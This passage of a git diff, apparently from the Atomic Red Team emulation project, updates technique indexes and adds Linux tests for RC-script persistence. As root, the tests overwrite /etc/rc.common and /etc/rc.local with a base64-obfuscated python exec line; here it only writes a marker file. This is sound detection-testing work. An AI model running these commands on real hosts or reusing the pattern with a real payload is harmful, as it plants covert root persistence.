test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniq
ueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":
"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 0e530577..fda6082f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -160,6 +160,8 @@ privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4 privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt 
@@ -536,6 +538,8 @@ persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index d4e71a68..89eb46ca 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -32,6 +32,8 @@ privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injecti privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh 
@@ -157,6 +159,8 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash +persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index a9ae5a7c..e7646cfb 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -324,6 +324,8 @@ - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - Atomic Test #1: Re-Opened Applications [macos] - Atomic Test #2: Re-Opened Applications [macos] 
@@ -967,6 +969,8 @@ - T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - Atomic Test #1: Re-Opened Applications [macos] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index d1576879..6499f682 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -122,7 +122,9 @@ - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] 
@@ -451,7 +453,9 @@ - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 241437be..420df707 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md 
@@ -23,7 +23,7 @@ | | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | | | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
@@ -40,7 +40,7 @@ | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [RC Scripts](../../T1037.004/T1037.004.md) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 69c30c6a..9500a007 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -15389,6 +15389,48 @@ privilege-escalation: ' elevation_required: true name: bash + - name: rc.common + auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a + description: 'Modify rc.common + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common + sudo chmod +x /etc/rc.common + cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common + && sudo rm $origfilename;fi + +' + - name: rc.local + auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 + description: 'Modify rc.local + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + +' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' 
@@ -43035,6 +43077,48 @@ persistence: ' elevation_required: true name: bash + - name: rc.common + auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a + description: 'Modify rc.common + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common + sudo chmod +x /etc/rc.common + cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common + && sudo rm $origfilename;fi + +' + - name: rc.local + auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 + description: 'Modify rc.local + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + +' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' 
diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 994659fb..5e258a38 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -12,6 +12,10 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr - [Atomic Test #1 - rc.common](#atomic-test-1---rccommon) +- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon) + +- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal) +
@@ -38,4 +42,68 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e +
+
+ +## Atomic Test #2 - rc.common +Modify rc.common + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common +sudo chmod +x /etc/rc.common +``` + +#### Cleanup Commands: +```bash +origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi +``` + + + + + +
+
+ +## Atomic Test #3 - rc.local +Modify rc.local + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local +sudo chmod +x /etc/rc.local +``` + +#### Cleanup Commands: +```bash +origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi +``` + + + + +
diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index 5e258a38..858ef875 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -1,105 +1,45 @@ -# T1037.004 - RC Scripts -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004) -
Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. +# T1137.004 - Outlook Home Page +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/004) +
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) -Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. - -Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) - -Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
+Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) +
## Atomic Tests -- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon) - -- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon) - -- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal) +- [Atomic Test #1 - Install Outlook Home Page Persistence](#atomic-test-1---install-outlook-home-page-persistence)
